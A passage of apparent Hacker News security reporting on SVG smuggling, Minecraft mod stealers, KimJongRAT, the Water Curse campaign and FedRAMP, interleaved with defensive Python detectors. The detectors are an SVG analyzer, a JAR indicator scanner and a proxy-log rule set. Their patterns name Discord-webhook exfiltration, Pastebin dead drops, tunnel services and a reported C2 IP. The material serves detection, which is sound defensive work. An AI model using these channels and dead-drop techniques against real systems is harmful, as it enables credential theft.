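            if name.startswith("on"):  # onload= and friends
                f["event_handlers"] += 1
            elif name == "href":
                if value.lower().startswith(("http://", "https://")):
                    f["external_links"].append(value)
                elif value.startswith("data:") and "base64," in value:
                    kind = _sniff(value.split("base64,", 1)[1])
                    if kind:
                        f["embedded_archives"].append({"kind": kind, "source": "data-uri", "b64_len": len(value)})
    score = 0
    score += 3 if f["embedded_archives"] else 0
    score += 2 if len(f["smuggling_apis"]) >= 2 else 0
    score += 1 if f["scripts"] or f["event_handlers"] else 0
    score += 1 if any(_is_file_host(urlparse(u).netloc) for u in f["external_links"]) else 0
    f["smuggling_apis"] = sorted(f["smuggling_apis"])
    f["score"] = score
    f["verdict"] = "smuggling" if score >= 4 else "suspicious" if score else "clean"
    return f


if __name__ == "__main__":
    print(analyze_svg(BENIGN_SVG)["verdict"], analyze_svg(SMUGGLING_SVG))
```

    A mail gateway can apply the same logic with a harsher policy: an SVG with any script element or event handler has no business in an inbound attachment, whatever its score.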


    “A natural evolution from its earlier SVG smuggling techniques, this threat actor has adopted a modular, memory-resident loader that can execute payloads dynamically and entirely in memory, leaving minimal traces behind,” the researchers said.

    “The presence of Portuguese-language strings and method parameters within the loader mirrors TTPs commonly observed in Brazilian banking malware, suggesting potential code reuse, shared development resources or even cross-regional actor collaboration.”

    ClickFix Surge Propels Drive-By Compromises

    The findings also coincide with a rise in social engineering attacks that employ the ClickFix tactic to deploy stealers and remote access trojans like Lumma Stealer and SectopRAT under the guise of fixing an issue or completing a CAPTCHA verification.

    According to statistics shared by ReliaQuest, drive-by compromises accounted for 23% of all phishing-based tactics observed between March and May 2025. “Techniques like ClickFix were central to drive-by downloads,” the cybersecurity company said.

    ClickFix is effective primarily because it deceives targets into carrying out seemingly harmless, everyday actions that are unlikely to raise any red flags, because they’re so used to seeing CAPTCHA screening pages and other notifications. What makes it compelling is that it gets users to do the main work of infecting their own machines instead of having to resort to more sophisticated methods like exploiting software flaws.

    “External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities,” ReliaQuest said. “This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.”



    Source: thehackernews.com…

  • 1,500+ Minecraft Players Infected by Java Malware Masquerading as Game Mods on GitHub


    A new multi-stage malware campaign is targeting Minecraft users with Java-based malware distributed through a distribution-as-a-service (DaaS) offering called the Stargazers Ghost Network.

    “The campaigns resulted in a multi-stage attack chain targeting Minecraft users specifically,” Check Point researchers Jaromír Hořejší and Antonis Terefos said in a report shared with The Hacker News.

    “The malware was impersonating Oringo and Taunahi, which are ‘Scripts and macros tools’ (aka cheats). Both the first and second stages are developed in Java and can only be executed if the Minecraft runtime is installed on the host machine.”

    The end goal of the attack is to trick players into downloading a Minecraft mod from GitHub and deliver a .NET information stealer with comprehensive data theft capabilities. The campaign was first detected by the cybersecurity company in March 2025.

    What makes the activity notable is its use of an illicit offering called the Stargazers Ghost Network, which makes use of thousands of GitHub accounts to set up tainted repositories that masquerade as cracked software and game cheats.


    These malicious repositories, masquerading as Minecraft mods, serve as a conduit for infecting users of the popular video game with a Java loader (e.g., “Oringo-1.8.9.jar”) that remains undetected by all antivirus engines as of writing.

    The Java archive (JAR) files implement simple anti-VM and anti-analysis techniques to sidestep detection efforts. Their main objective is to download and run another JAR file, a second-stage stealer that fetches and executes a .NET stealer as the final payload when the game is started by the victim.

    The second-stage component is retrieved from an IP address (“147.45.79.104”) that is stored Base64-encoded on Pastebin, essentially turning the paste site into a dead-drop resolver.

    “To add mods to a Minecraft game, the user must copy the malicious JAR archive into the Minecraft mods folder. After starting the game, the Minecraft process will load all mods from the folder, including the malicious mod, which will download and execute the second stage,” the researchers said.
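    A mod JAR that is really a loader has to contain the pieces described above: code that fetches over the network, decodes Base64, names a paste site, checks for a virtual machine, and runs what it downloads. Those show up as constant-pool strings in the class files, so a triage pass over the archive catches a sample even when no antivirus engine flags it. The block below is an added example, not Check Point's tooling: the JARs are constructed in memory (a real class file is bytecode, and only the strings a strings-style pass would expose are embedded), the indicator list is a heuristic assumption rather than a signature for the Oringo or Taunahi samples, and the dead-drop decoder uses the IP from the report with no port, since none is given.

```python
"""Triage a Minecraft mod JAR and decode a Pastebin-style dead drop (added example)."""
import base64
import binascii
import io
import ipaddress
import re
import zipfile

# Heuristic indicators (assumption), matched against raw class-file bytes.
INDICATORS = {
    "network_fetch": rb"java/net/(URL|HttpURLConnection|Socket)",
    "base64_decode": rb"java/util/Base64",
    "paste_site": rb"pastebin\.com|rentry\.co|hastebin",
    "anti_vm": rb"VirtualBox|VMware|QEMU|vbox",
    "process_exec": rb"java/lang/Runtime|java/lang/ProcessBuilder",
    "discord_webhook": rb"discord(app)?\.com/api/webhooks",
}
DESCRIPTORS = ("fabric.mod.json", "mcmod.info", "META-INF/mods.toml")


def build_sample_jar(trojanized):
    """Constructed look-alike of a mod JAR; only the string table of the class is realistic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("fabric.mod.json", '{"id": "oringo", "version": "1.8.9"}')
        if trojanized:
            strings = (b"java/net/URL\0java/util/Base64$Decoder\0https://pastebin.com/raw/XXXXXXXX\0"
                       b"VirtualBox\0VMware\0java/lang/Runtime\0exec\0")
        else:
            strings = b"net/minecraft/client/Minecraft\0onTick\0"
        z.writestr("me/oringo/Main.class", b"\xca\xfe\xba\xbe" + bytes(4) + strings)
    return buf.getvalue()


def scan_jar(data):
    """Map each indicator to the class files that contain it and derive a coarse verdict."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        for name in names:
            if not name.endswith(".class"):
                continue
            blob = z.read(name)
            for indicator, pattern in INDICATORS.items():
                if re.search(pattern, blob):
                    hits.setdefault(indicator, []).append(name)
    found = set(hits)
    staged = {"network_fetch", "base64_decode"} <= found      # fetches and decodes a next stage
    evasive = bool({"paste_site", "anti_vm", "process_exec", "discord_webhook"} & found)
    verdict = "suspicious" if staged and evasive else "review" if "network_fetch" in found else "no_indicators"
    return {"has_mod_descriptor": any(d in names for d in DESCRIPTORS), "indicators": hits, "verdict": verdict}


def resolve_dead_drop(paste_text):
    """Decode a Base64 paste into (host, port); None unless it is a valid IP literal."""
    try:
        decoded = base64.b64decode(paste_text.strip(), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    host, _, port = decoded.partition(":")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return None
    return host, (int(port) if port.isdigit() else None)


# Constructed paste content: the report's IP, Base64-encoded, with no port.
SAMPLE_PASTE = base64.b64encode(b"147.45.79.104").decode()


if __name__ == "__main__":
    print(scan_jar(build_sample_jar(True)))
    print(scan_jar(build_sample_jar(False)))
    print(resolve_dead_drop(SAMPLE_PASTE))
```

    Legitimate mods do talk to the network (update checks, telemetry), which is why network_fetch alone only earns a review; it is the combination with a paste-site string or VM checks that should stop a mod from going into the mods folder.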

    Besides downloading the .NET stealer, the second-stage stealer is equipped to steal Discord and Minecraft tokens, as well as Telegram-related data. The .NET stealer, on the other hand, is capable of harvesting credentials from various web browsers and gathering files, and information from cryptocurrency wallets and other apps like Steam, and FileZilla.

    It can also take screenshots and amass information related to running processes, the system’s external IP address, and clipboard contents. The captured information is eventually bundled and transmitted back to the attacker via a Discord webhook.

    The campaign is suspected to be the work of a Russian-speaking threat actor owing to the presence of several artifacts written in the Russian language and the timezone of the attacker’s commits (UTC+03:00). It’s estimated that more than 1,500 devices may have fallen prey to the scheme.

    “This case highlights how popular gaming communities can be exploited as effective vectors for malware distribution, emphasizing the importance of caution when downloading third-party content,” the researchers said.

    “The Stargazers Ghost Network has been actively distributing this malware, targeting Minecraft players seeking mods to enhance their gameplay. What appeared to be harmless downloads were, in fact, Java-based loaders that deployed two additional stealers, capable of exfiltrating credentials and other sensitive data.”

    New Variants of KimJongRAT Stealer Detected

    The development comes as Palo Alto Networks Unit 42 detailed two new variants of an information stealer codenamed KimJongRAT that’s likely connected to the same North Korean threat actor behind BabyShark and Stolen Pencil. KimJongRAT has been detected in the wild as far back as May 2013, delivered as a secondary payload in BabyShark attacks.


    “One of the new variants uses a Portable Executable (PE) file and the other uses a PowerShell implementation,” security researcher Dominik Reichel said. “The PE and PowerShell variants are both initiated by clicking a Windows shortcut (LNK) file that downloads a dropper file from an attacker-controlled content delivery network (CDN) account.”

    While the PE variant’s dropper deploys a loader, a decoy PDF and a text file, the dropper in the PowerShell variant deploys a decoy PDF file along with a ZIP archive. The loader, in turn, downloads auxiliary payloads, including the stealer component for KimJongRAT.

    The ZIP archive delivered by the PowerShell variant’s dropper contains scripts that embed the KimJongRAT PowerShell-based stealer and keylogger components.

    Both the new incarnations are capable of gathering and transferring victim information, files matching specific extensions, and browser data, such as credentials and details from cryptocurrency wallet extensions. The PE variant of KimJongRAT is also designed to harvest FTP and email client information.

    “The continued development and deployment of KimJongRAT, featuring changing techniques such as using a legitimate CDN server to disguise its distribution, demonstrates a clear and ongoing threat,” Unit 42 said. “This adaptability not only showcases the persistent threat posed by such malware but also underscores its developers’ commitment to updating and expanding its capabilities.”



    Source: thehackernews.com…

  • Water Curse Employs 76 GitHub Accounts to Deliver Multi-Stage Malware Campaign


    Multi-Stage Malware Campaign

    Cybersecurity researchers have exposed a previously unknown threat actor known as Water Curse that relies on weaponized GitHub repositories to deliver multi-stage malware.

    “The malware enables data exfiltration (including credentials, browser data, and session tokens), remote access, and long-term persistence on infected systems,” Trend Micro researchers Jovit Samaniego, Aira Marcelo, Mohamed Fahmy, and Gabriel Nicoleta said in an analysis published this week.

    The “broad and sustained” campaign, first spotted last month, set up repositories offering seemingly innocuous penetration testing utilities, but harbored within their Visual Studio project configuration files malicious payloads such as an SMTP email bomber and Sakura-RAT.

    Water Curse’s arsenal incorporates a wide range of tools and programming languages, underscoring their cross-functional development capabilities to target the supply chain with “developer-oriented information stealers that blur the line between red team tooling and active malware distribution.”

    “Upon execution, the malicious payloads initiated complex multistage infection chains utilizing obfuscated scripts written in Visual Basic Script (VBS) and PowerShell,” the researchers said. “These scripts downloaded encrypted archives, extracted Electron-based applications, and performed extensive system reconnaissance.”


    The attacks are also characterized by the use of anti-debugging techniques, privilege escalation methods, and persistence mechanisms to maintain a long-term foothold on the affected hosts. Also employed are PowerShell scripts to weaken host defenses and inhibit system recovery.

    Water Curse has been described as a financially motivated threat actor that’s driven by credential theft, session hijacking, and resale of illicit access. As many as 76 GitHub accounts have been linked to the campaign. There is evidence to suggest related activity may have been ongoing all the way back to March 2023.

    The emergence of Water Curse is the latest example of how threat actors are abusing the trust associated with legitimate platforms like GitHub as a delivery channel for malware and to stage software supply chain attacks.


    “Their repositories include malware, evasion utilities, game cheats, aimbots, cryptocurrency wallet tools, OSINT scrapers, spamming bots, and credential stealers,” Trend Micro said. “This reflects a multi-vertical targeting strategy that blends cybercrime with opportunistic monetization.”

    “Their infrastructure and behavior indicate a focus on stealth, automation, and scalability, with active exfiltration via Telegram and public file-sharing services.”

    The disclosure comes as multiple campaigns have been observed leveraging the prevalent ClickFix strategy to deploy various malware families such as AsyncRAT, DeerStealer (via a loader named Hijack Loader), Filch Stealer, LightPerlGirl, and SectopRAT (also via Hijack Loader).


    AsyncRAT is one of the many readily available remote access trojans (RATs) that have been put to use by unidentified threat actors to indiscriminately target thousands of organizations spanning multiple sectors since early 2024. Some aspects of the campaign were documented by Forcepoint in August 2024 and January 2025.

    “This tradecraft allows the malware to bypass traditional perimeter defenses, particularly by using Cloudflare’s temporary tunnels to serve payloads from seemingly legitimate infrastructure,” Halcyon said. “These tunnels provide attackers with ephemeral and unregistered subdomains that appear trustworthy to perimeter controls, making it difficult to pre-block or blacklist.”

    “Because the infrastructure is spun up dynamically via legitimate services, defenders face challenges in distinguishing malicious use from authorized DevOps or IT maintenance workflows. This tactic enables threat actors to deliver payloads without relying on compromised servers or bulletproof hosting, increasing both the scale and stealth of the campaign.”

    The findings also follow the discovery of an ongoing malicious campaign that has targeted various European organizations located in Spain, Portugal, Italy, France, Belgium, and the Netherlands with invoice-themed phishing lures to deliver a remote access trojan named Sorillus RAT (aka Ratty RAT).


    Previous campaigns distributing the malware have singled out accounting and tax professionals using income tax return decoys, some of which have leveraged HTML smuggling techniques to conceal the malicious payloads.

    The attack chain detailed by Orange Cyberdefense employs similar phishing emails that aim to trick recipients into opening PDF attachments containing a OneDrive link that points to a PDF file directly hosted on the cloud storage service while prompting the user to click an “Open the document” button.

    Doing so redirects the victim to a malicious web server that acts as a traffic distribution system (TDS), evaluating the incoming request to decide whether the visitor should be advanced to the next stage of the infection. If the victim’s machine meets the necessary criteria, they are shown a benign PDF while a JAR file is stealthily downloaded to drop and execute Sorillus RAT.


    A Java-based RAT that first surfaced in 2019, Sorillus is a cross-platform malware that can harvest sensitive information, download/upload files, take screenshots, record audio, log keystrokes, run arbitrary commands, and even uninstall itself. It also doesn’t help that numerous cracked versions of the trojan are available online.

    The attacks are assessed to be part of a broader campaign that has been observed delivering SambaSpy to users in Italy. SambaSpy, per Orange Cyberdefense, belongs to the Sorillus malware family.

    “The operation showcases a strategic blend of legitimate services – such as OneDrive, MediaFire, and tunneling platforms like Ngrok and LocaltoNet – to evade detection,” the cybersecurity company said. “The repeated use of Brazilian Portuguese in payloads supports a likely attribution to Brazilian-speaking threat actors.”
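    A defender-side check that follows from the tunnel, webhook and dead-drop tradecraft described in the Minecraft stealer, AsyncRAT and Sorillus sections, as an added example that is not part of the original article or any vendor's code: it scans constructed proxy-log lines for the ephemeral tunnel domains, Discord webhook posts and Pastebin raw fetches the article names. The log format, the sample lines and the localto.net suffix for LocaltoNet are assumptions.

```python
"""Flag proxy-log requests to the ephemeral tunnel, dead-drop and webhook
services named in the article. Added example, not code from the article or
from any vendor it cites. Log format and sample lines are constructed."""
import re
from urllib.parse import urlparse

# Hostname suffixes of tunnel services. trycloudflare.com is the domain
# Cloudflare quick tunnels hand out; the ngrok domains are ngrok's public
# tunnel domains; localto.net is assumed here for LocaltoNet.
TUNNEL_SUFFIXES = {
    ".trycloudflare.com": "cloudflare-quick-tunnel",
    ".ngrok.io": "ngrok",
    ".ngrok-free.app": "ngrok",
    ".ngrok.app": "ngrok",
    ".localto.net": "localtonet (assumed domain)",
}

# Host + path rules: Discord webhooks (stealer exfiltration) and Pastebin raw
# pastes (the Base64 dead-drop resolver pattern).
PATH_RULES = [
    (re.compile(r"^discord(app)?\.com$"), re.compile(r"^/api/webhooks/\d+/"), "discord-webhook"),
    (re.compile(r"^pastebin\.com$"), re.compile(r"^/raw/"), "pastebin-raw"),
]

# Constructed Squid-style line layout: timestamp, client IP, method, URL.
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def classify(url):
    """Return a rule label if the URL matches a watched service, else None."""
    if "://" not in url:          # CONNECT lines carry only host:port
        url = "https://" + url
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    for suffix, label in TUNNEL_SUFFIXES.items():
        if host.endswith(suffix):
            return label
    for host_re, path_re, label in PATH_RULES:
        if host_re.match(host) and path_re.match(parsed.path):
            return label
    return None


def scan_log(lines):
    """Return (client, label, url) for every line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group("url"))
        if label:
            hits.append((m.group("client"), label, m.group("url")))
    return hits


SAMPLE_LOG = [  # constructed, not real traffic
    "2025-06-18T09:14:02Z 10.0.0.12 GET https://www.example.com/index.html",
    "2025-06-18T09:14:05Z 10.0.0.12 POST https://discord.com/api/webhooks/1234567890/abcDEF",
    "2025-06-18T09:15:11Z 10.0.0.40 GET https://pastebin.com/raw/AbCdEfGh",
    "2025-06-18T09:16:30Z 10.0.0.40 CONNECT quiet-lake-1234.trycloudflare.com:443",
    "2025-06-18T09:17:00Z 10.0.0.55 GET https://pastebin.com/AbCdEfGh",
    "2025-06-18T09:18:22Z 10.0.0.55 GET https://abcd-12-34-56-78.ngrok-free.app/",
]

if __name__ == "__main__":
    for client, label, url in scan_log(SAMPLE_LOG):
        print(f"{client:<10} {label:<24} {url}")
```

    Hits from these rules are triage leads, not verdicts: quick tunnels and webhooks also have legitimate developer uses, so correlate with the client process and timing before blocking.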



    Source: thehackernews.com…


  • FedRAMP at Startup Speed: Lessons Learned


    Jun 18, 2025 | The Hacker News | DevSecOps / Security Architecture

    For organizations eyeing the federal market, FedRAMP can feel like a gated fortress. With strict compliance requirements and a notoriously long runway, many companies assume the path to authorization is reserved for the well-resourced enterprise. But that’s changing.

    In this post, we break down how fast-moving startups can realistically achieve FedRAMP Moderate authorization without derailing product velocity, drawing from real-world lessons, technical insights, and the bruises earned along the way from a cybersecurity startup that just went through the process.

    Why It Matters

    Winning in the federal space starts with trust—and that trust begins with FedRAMP. But pursuing authorization is not a simple compliance checkbox. It’s a company-wide shift that requires intentional strategy, deep security investment, and a willingness to move differently than most startups.

    Let’s get into what that actually looks like.

    Keys to a Successful FedRAMP Authorization

    1. Align to NIST 800-53 from Day One

    Startups that bolt on compliance late in the game usually end up rewriting their infrastructure to fit. The better path? Build directly against the NIST 800-53 Rev. 5 Moderate baseline as your internal security framework—even before FedRAMP is on the roadmap.

    This early commitment reduces rework, accelerates ATO prep, and fosters a security-first mindset that scales. Compliance is also often a must-have for doing business with mid-sized and large enterprises, so it’s more than a checkbox; it’s a business enabler. Here at Beyond Identity, when we say “secure-by-design” platform, a foundational component is alignment to strict compliance frameworks from the start.

    2. Build an Integrated Security Team

    FedRAMP isn’t just an InfoSec problem—it’s a team sport. Success requires tight integration across:

    • Compliance-focused InfoSec leads who understand the nuances of FedRAMP controls
    • Application security engineers who can embed guardrails without bottlenecking delivery
    • DevSecOps teams to operationalize security across pipelines
    • Platform engineers responsible for both cloud posture and deployment parity

    Cross-functional collaboration isn’t a nice-to-have—it’s how you survive the inevitable curveballs.

    3. Mirror Your Commercial and Federal Architectures

    Attempting to run a separate product for the federal market? Don’t.

    Winning startups keep a single software release chain, with identical configurations and infrastructure across both environments. That means:

    • No federal-only forks
    • No custom hardening outside the mainline
    • One platform, one set of controls

    This approach dramatically reduces technical drift, simplifies audits, and ensures your engineers aren’t context-switching between two worlds.

    Scrutinize the Business Case

    FedRAMP isn’t cheap. Initial investments often exceed $1 million, and timelines can stretch beyond 12 months. Before you start:

    • Validate the market opportunity—can you actually win federal deals?
    • Confirm executive sponsorship—FedRAMP requires top-down alignment
    • Look for 10x return potential—not just for the cost, but for the time and energy involved

    This isn’t a growth experiment. It’s a long play that demands conviction.

    Pick the Right Partners

    Navigating FedRAMP alone is a losing strategy. Choose external vendors carefully:

    • Ask for customer references with successful FedRAMP delivery
    • Watch for predatory pricing—especially from Third Party Assessment Organizations and automation tools
    • Prioritize collaboration and transparency—your partner becomes an extension of your team

    Cut corners here and you’ll pay for it later—in both delays and trust.

    Build Internal Muscle

    No external vendor can replace internal readiness. You’ll need:

    • Security architecture skills with depth in cryptography, PKI, and TPMs
    • Ops maturity to manage change control, evidence collection, and ticketing rigor
    • Strong program management to coordinate vendors, auditors, and internal stakeholders
    • Team training—FedRAMP has a steep learning curve. Invest early.

    FedRAMP reshapes how you ship, with slower velocity, higher overhead, and the need for tight cross-functional alignment. While the impact is real, the long-term payoff is disciplined security and process maturity that goes well beyond compliance.

    The Toughest Challenges

    Every FedRAMP journey hits turbulence. Some of the hardest problems include:

    • Interpreting FedRAMP Moderate controls without clear guidance
    • Defining authorization boundaries across microservices and shared components
    • Operationalizing DevSecOps gates that enforce security without stalling builds
    • Choosing the right tools for SAST, DAST, SBOM, and SCA—and integrating them

    Don’t underestimate these. They can become critical blockers without careful planning.

    Achieving FedRAMP at startup speed is possible—but only with ruthless prioritization, integrated security culture, and a deep understanding of what you’re signing up for.

    If you’re considering the journey: start small, move deliberately, and commit fully. The federal market rewards trust—but only for those who earn it.

    Beyond Identity is a FedRAMP-moderate identity and access management platform that eliminates identity-based attacks. Learn more at beyondidentity.com.


    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…